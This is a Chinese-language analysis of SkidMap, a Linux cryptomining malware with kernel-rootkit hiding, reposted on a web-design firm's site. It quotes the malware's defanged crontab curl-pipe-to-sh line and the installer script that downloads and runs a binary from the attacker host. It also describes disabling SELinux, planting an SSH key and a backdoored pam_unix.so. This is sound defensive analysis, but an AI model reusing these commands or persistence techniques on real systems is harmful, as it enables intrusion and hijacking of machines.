如何進(jìn)行Linux惡意軟件SkidMap分析，針對(duì)這個(gè)問(wèn)題，這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答，希望可以幫助更多想解決這個(gè)問(wèn)題的小伙伴找到更簡(jiǎn)單易行的方法。

網(wǎng)站建設(shè)哪家好，找成都創(chuàng)新互聯(lián)！專注于網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站建設(shè)、微信開(kāi)發(fā)、小程序設(shè)計(jì)、集團(tuán)企業(yè)網(wǎng)站建設(shè)等服務(wù)項(xiàng)目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了韓城免費(fèi)建站歡迎大家使用！

挖掘加密貨幣惡意軟件仍然是一個(gè)普遍的威脅。網(wǎng)絡(luò)罪犯也越來(lái)越多地探索新的平臺(tái)和方法來(lái)進(jìn)一步利用挖礦惡意軟件——從移動(dòng)設(shè)備、Unix和類Unix系統(tǒng)到服務(wù)器和云環(huán)境。

攻擊者不斷提升惡意軟件抵御檢測(cè)的能力。例如，將惡意軟件與看門(mén)狗組件捆綁在一起，以確保非法的加密貨幣挖掘活動(dòng)在受感染的機(jī)器中持續(xù)存在，或者基于Linux的系統(tǒng)，利用基于LD_PRELOAD-based的rootkit使其組件無(wú)法被系統(tǒng)檢測(cè)到。

SkidMap是最近偶然發(fā)現(xiàn)的一個(gè)Linux惡意軟件，它展示了最近加密貨幣挖掘威脅的日益復(fù)雜性。這個(gè)惡意軟件之所以引人注目，是因?yàn)樗虞d惡意內(nèi)核模塊的方式，使其惡意行為不會(huì)被發(fā)現(xiàn)。

與用戶模式的rootkit相比，這些內(nèi)核模式的rootkit不僅更難檢測(cè)，攻擊者還可以使用它們獲得對(duì)受影響系統(tǒng)的訪問(wèn)權(quán)限。skidmap還可以設(shè)置一個(gè)主密碼，讓它可以訪問(wèn)系統(tǒng)中的任何用戶帳戶。SkidMap的許多例程都需要根訪問(wèn)，SkidMap使用的攻擊向量（無(wú)論是通過(guò)漏洞攻擊、錯(cuò)誤配置）很可能與向攻擊者提供對(duì)系統(tǒng)的根訪問(wèn)或管理訪問(wèn)的攻擊向量相同。

Skidmap感染鏈

惡意軟件通過(guò)crontab將自身安裝到目標(biāo)計(jì)算機(jī)上，如下所示：

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

然后，安裝腳本pm.sh下載主二進(jìn)制文件“pc”：

if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then
   wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then
   curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then
   get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then
   cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else
   url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi

執(zhí)行“PC”二進(jìn)制文件后，將更改削弱受影響機(jī)器的安全設(shè)置。如果文件/usr/sbin/setenforce存在，惡意軟件執(zhí)行命令setenforce 0。如果系統(tǒng)有/etc/selinux/config文件，它會(huì)將這些命令寫(xiě)入文件：selinux=disabled和selinux=targeted命令。前者禁用selinux策略（或不允許加載selinux策略），而后者將選定進(jìn)程設(shè)置為在受限域中運(yùn)行。

SkidMap還提供了后門(mén)，通過(guò)讓二進(jìn)制文件將其處理程序的公鑰添加到authorized_keys文件來(lái)實(shí)現(xiàn)，該文件包含身份驗(yàn)證所需的密鑰。

除了后門(mén)進(jìn)入，SkidMap還為攻擊者提供了另一種進(jìn)入機(jī)器的方式。惡意軟件用自己的惡意版本（檢測(cè)為backdoor.linux.pamdor.a）替換系統(tǒng)的pam_unix.so文件（負(fù)責(zé)標(biāo)準(zhǔn)unix身份驗(yàn)證的模塊）。如圖2所示，此惡意pam_unix.so文件接受任何用戶的特定密碼，從而允許攻擊者以計(jì)算機(jī)中的任何用戶身份登錄。

SkidMap加密貨幣

“pc”二進(jìn)制文件檢查受感染系統(tǒng)的操作系統(tǒng)是debian還是rhel/centos。

對(duì)于基于debian的系統(tǒng)，它將cryptocurrency miner的有效負(fù)載降到/tmp/miner2。對(duì)于centos/rhel系統(tǒng)，它將從url hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz下載一個(gè)tar文件，該文件包含cryptocurrency miner及其多個(gè)組件，然后將其解壓縮并安裝。

SkidMap其他惡意組件

惡意軟件組件旨在進(jìn)一步混淆其惡意活動(dòng)并確保它們繼續(xù)運(yùn)行：

1、一個(gè)偽“rm”二進(jìn)制文件：tar文件中包含的一個(gè)組件是一個(gè)偽“rm”二進(jìn)制文件，它將替換原始的文件（rm通常用作刪除文件的命令）。此文件設(shè)置一個(gè)惡意cron作業(yè)，該作業(yè)將下載并執(zhí)行一個(gè)文件。

2、kaudited，安裝/usr/bin/kaudited文件。此二進(jìn)制文件在受感染的計(jì)算機(jī)上安裝多個(gè)可加載內(nèi)核模塊（LKM）。為了確保受感染的機(jī)器不會(huì)由于內(nèi)核模式rootkits而崩潰，它對(duì)特定的內(nèi)核版本使用不同的模塊。kaudited二進(jìn)制文件還刪除了一個(gè)監(jiān)視程序組件。

3、iproute，該模塊鉤住系統(tǒng)調(diào)用getdents（通常用于讀取目錄的內(nèi)容）以隱藏特定的文件。

4、netlink，偽造網(wǎng)絡(luò)流量和cpu相關(guān)的統(tǒng)計(jì)，使受感染機(jī)器的CPU負(fù)載始終看起來(lái)很低。

解決方案

SkidMap使用相當(dāng)先進(jìn)的方法來(lái)確保它及其組件不被發(fā)現(xiàn)。此外，SkidMap有多種方式訪問(wèn)受影響的機(jī)器，使其能夠重新影響已恢復(fù)或清理的系統(tǒng)。

加密貨幣挖掘不僅影響服務(wù)器和工作站的性能，導(dǎo)致更高的開(kāi)支，甚至擾亂業(yè)務(wù)?？紤]到Linux在許多企業(yè)環(huán)境中的使用，用戶和管理員應(yīng)保持系統(tǒng)和服務(wù)器的更新和修補(bǔ)；謹(jǐn)防未經(jīng)驗(yàn)證的第三方存儲(chǔ)庫(kù)；防止惡意文件或進(jìn)程運(yùn)行。

IoCs

關(guān)于如何進(jìn)行Linux惡意軟件SkidMap分析問(wèn)題的解答就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，如果你還有很多疑惑沒(méi)有解開(kāi)，可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關(guān)知識(shí)。

網(wǎng)站題目：如何進(jìn)行Linux惡意軟件SkidMap分析
網(wǎng)頁(yè)網(wǎng)址：http://www.rwnh.cn/article40/gcgjeo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供靜態(tài)網(wǎng)站、建站公司、網(wǎng)站建設(shè)、App開(kāi)發(fā)、搜索引擎優(yōu)化、標(biāo)簽優(yōu)化

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)